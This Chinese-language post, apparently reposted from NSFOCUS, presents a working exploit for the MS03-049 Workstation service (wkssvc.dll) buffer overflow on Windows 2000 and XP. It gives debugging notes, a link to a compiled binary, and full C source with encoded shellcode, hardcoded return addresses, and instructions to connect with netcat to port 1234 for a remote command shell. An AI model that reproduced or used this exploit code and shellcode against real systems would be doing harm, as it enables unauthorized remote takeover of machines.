信息来源:绿盟
作者sbaa
为了unicode 白忙了一天了,感谢oYxin和zodiacsoft的帮助!
编译好的
http://sbaa.3322.org/public1/tool/ms03049.rar
关于这个漏洞的描述 eEys写得很清楚了
只是开始我理解有些问题,其实溢出是在wkssvc.dll 里的某个api
call vsprintf函数时,
对于w2k 用NetValidateName这个api发包,就可以让服务端调用到
这个api ,但call 这个api之前需要检查是否有写权限,所以ntfs分区不行
对于xp 多了一个扩展的api NetAddAlternateComputerName,用这个api
发包,服务端也会掉vsprintf,但和2k的位置是不一样的,这个地方不需要检测权限
所以没有ntfs的限制。
对于2k 很容易发生溢出 ,简单调试后0.1版出来了。
当时以为xp可以用NetAddAlternateComputerName attack 2k 其实2k服务端会检测
没有这个扩展api是不会调用的,所以不行。
对于xp 发现溢出需要加长buffer,而且buffer里在某些地方会被截断,
以为是unicode转成ascii了,所以忙了一天写wchar的shellcode,晚上试了发现还是不行
仔细看了原来是 vsprintf的format %ws 这个是打印双字节的,只要每个字符加上0x0就可以
不是做了unicode转换,也不要用 MultiByteToWideChar,因为这个是转unicode,和 %ws的转换
是不一样的。
对于2k和xp不同的是xp是靠vsprintf 写的 buf 去溢出的
而2k是靠原来的buffer在另一个地方溢出,我试了给长一点的buf,但在前面又会引发异常,不过
这些都在检测权限之后了,所以多研究也区别不大了。
程序我在cn 2k sp4,en2k sp4,cn xp sp1
上测试通过,因为是栈溢出,比较容易研究,如果哪个系统不能成功,自己改改地址吧
ps 我2k是jmp ebx 的,但xp 是jmp esp的
#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>
typedef
//NET_API_STATUS NET_API_FUNCTION
(*MYPROC)(
IN LPCWSTR Server OPTIONAL,
IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL,
IN ULONG Reserved
);
#define SIZE 8192
#pragma comment(lib,"mpr.lib")
#pragma comment(lib,"Ws2_32.lib")
unsigned char shellcode[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\xe4\x01\x80\x34\x0A\x1b\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x98\xF7\x2F\x90\xEF\xF3\x5C\x1A\x1B\x1B\x92\x1D\xE4\x2D\x73\x95"
"\x55\x15\xF7\xF3\x7A\x1A\x1B\x1B\x92\x5D\x13\xE4\x2D\x73\xB6\xC2"
"\x1E\xD5\xF3\x49\x1A\x1B\x1B\x92\x5D\x17\x73\x77\x77\x1B\x1B\x73"
"\x28\x29\x35\x7F\x73\x6C\x68\x29\x44\x4F\xE4\x4D\x13\x92\x5D\x1F"
"\xE4\x2D\x73\x69\xE5\xA8\x0D\xF3\x36\x1A\x1B\x1B\x92\x5D\x0B\xE4"
"\x2D\x73\xF4\xD5\xFB\x7B\xF3\x05\x1A\x1B\x1B\x92\x5D\x0F\xE4\x6D"
"\x1F\x73\xD0\xF6\xE7\x20\xF3\x15\x1A\x1B\x1B\x92\x5D\x03\xE4\x6D"
"\x1F\x73\xC2\x12\xEE\xB6\xF3\xE5\x1B\x1B\x1B\x92\x5D\x07\xE4\x6D"
"\x1F\x73\xBF\x01\x6B\xDC\xF3\xF5\x1B\x1B\x1B\x92\x5D\x3B\xE4\x6D"
"\x1F\x73\xBF\xB6\x35\xF2\xF3\xC5\x1B\x1B\x1B\x92\x5D\x3F\xE4\x6D"
"\x1F\x73\xFE\x52\x9D\x52\xF3\xD5\x1B\x1B\x1B\x92\x5D\x33\xE4\x6D"
"\x1F\x73\xFC\x62\xDD\x62\xF3\xA5\x1B\x1B\x1B\x92\x5D\x37\x28\xE4"
"\x9A\xF7\x8B\x1A\x1B\x1B\x4F\x73\x1A\x1A\x1B\x1B\xE4\x4D\x03\x4B"
"\x4B\x4B\x4B\x5B\x4B\x5B\x4B\xE4\x4D\x07\x90\xC3\x4C\x4C\x73\x19"
"\x1B\x1F\xC9\x90\xD7\x71\x0D\x4A\x48\xE4\x4D\x3B\x4C\x48\xE4\x4D"
"\x3F\x4C\x4A\x48\xE4\x4D\x33\x90\xCB\x73\x7E\x63\x7E\x1B\x73\x78"
"\x76\x7F\x35\x92\x7D\x2B\x98\xF7\x4F\x96\x27\x3F\x28\xDB\x28\xD2"
"\x98\xDA\x0E\xB0\xF9\xE6\xDD\x5F\x3F\x0B\x5F\xE5\x5F\x3F\x26\x92"
"\x4F\x3F\x53\x92\x4F\x3F\x57\x92\x4F\x3F\x4B\x96\x5F\x3F\x0B\x4F"
"\x4B\x4A\x4A\x4A\x71\x1A\x4A\x4A\xE4\x6D\x2B\x4A\xE4\x4D\x0B\x90"
"\xD7\x71\xE4\xE4\x2A\xE4\x4D\x17\x90\xD3\x4C\xE4\x4D\x37\xE4\x4D"
"\x0F\x4E\x4D\x7F\xBA\x2B\x1B\x1B\x1B\x9E\xDB\x63\x17\x90\x5B\x17"
"\x90\x6B\x07\xB6\x90\x73\x13\xF0\x12\x90\x5B\x2F\x90\xB3\xA3\x1B"
"\x1B\x1B\x90\xDE\x45\x46\xD9\x1F\x1B\x48\x4E\x4D\x4C\x90\x77\x3F"
"\x03\x90\x5E\x27\x90\x4F\x1E\x63\x18\xCE\x90\x51\x03\x90\x41\x3B"
"\x18\xC6\xF8\x29\x52\x90\x2F\x90\x18\xEE\x28\xE4\xE7\x28\xDB\xB7"
"\x21\xDF\x6F\x1C\xDA\xD4\x16\x18\xE3\xF0\xE9\x20\x67\x3F\x0F\x6E"
"\xFA\x90\x41\x3F\x18\xC6\x7D\x90\x17\x50\x90\x41\x07\x18\xC6\x90"
"\x1F\x90\x18\xDE\xF0\x19\x28\xDB\x90\xCE\x44\x45\x46\x40\xD9\x1F"
"\x1B\x8B\x8B\x8B\x9B\xA4\x29\x8F\xF8\xC9\x4D\xAF\x1B";
int main(int argc,char ** argv)
{
int ret=0;
HINSTANCE hInstance;
MYPROC procAddress=NULL;
unsigned char szBuffer[SIZE];
NETRESOURCE netResource;
int i=0,j;
unsigned char temp;
char host[30];
LPSTR hostipc[40];
LPWSTR hostl[60];
if(argc<2) {
printf("Windows Workstation ms03-049 wkssvc.dll buffer overflow \n \
bug discoveried by eEye,code by Hanabishi,shellcode by oc.192 \n \
Modified by sbaa(
sbaa@163.net) 2003/11/16 ver 0.2\n \
Usage: \n \
On 2k : \n \
%s IP --> attack 2k without ntfs\n \
On xp : \n \
%s IP 2k --> attack 2k without ntfs\n \
%s IP --> attack xp \n \
Next open another window : nc Ip 1234 --> Get cmd shell @.@\n",argv[0],argv[0],argv[0]);
printf("");
return 0;
}
sprintf(host,"\\\\%s",argv[1]);
sprintf((char *)hostipc,"%s\\ipc$",host);
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;
ret = WNetAddConnection2(&netResource, "", "", 0);
if (ret != 0)
{
fprintf(stderr, "Can't create null session ! \n");
// return 1;
}
hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "LoadLibrary failed\n");
return 1;
}
if (((argc>2) &&(strcmp(argv[2],"2k")!=0))||(argc==2))
procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName");
memset(szBuffer, 0x41, SIZE);
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetAddAlternateComputerName (Now try to attack 2k!) \n");
// return 1;
procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName");
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetValidateName!\n");
return 1;
}
memcpy(szBuffer, shellcode, sizeof(shellcode) - 1);
memcpy(szBuffer+1851,"\x1b\x4a\xfa\x7f",4);
memcpy(szBuffer+2017,"\x1b\x4a\xfa\x7f",4);
szBuffer[2048]=0;
}
else
{
for(j=0;j<SIZE/2;j++){
szBuffer[j*2]=0x41;
szBuffer[j*2+1]=0;
}
memcpy(szBuffer+2044*2,"\x12\x00\x45\x00\xfa\x00\x7f\x00",8);
for(j=0;j<sizeof(shellcode);j++){
temp=shellcode[j];
szBuffer[2064*2+j*2]=shellcode[j];
szBuffer[2064*2+j*2+1]=0;
}
szBuffer[SIZE-1]=0;
}
memset(hostl,0,sizeof(hostl));
MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);
try{
ret = (procAddress)((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);
}
catch(...)
{
}
printf("%d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hInstance);
return 0;
}
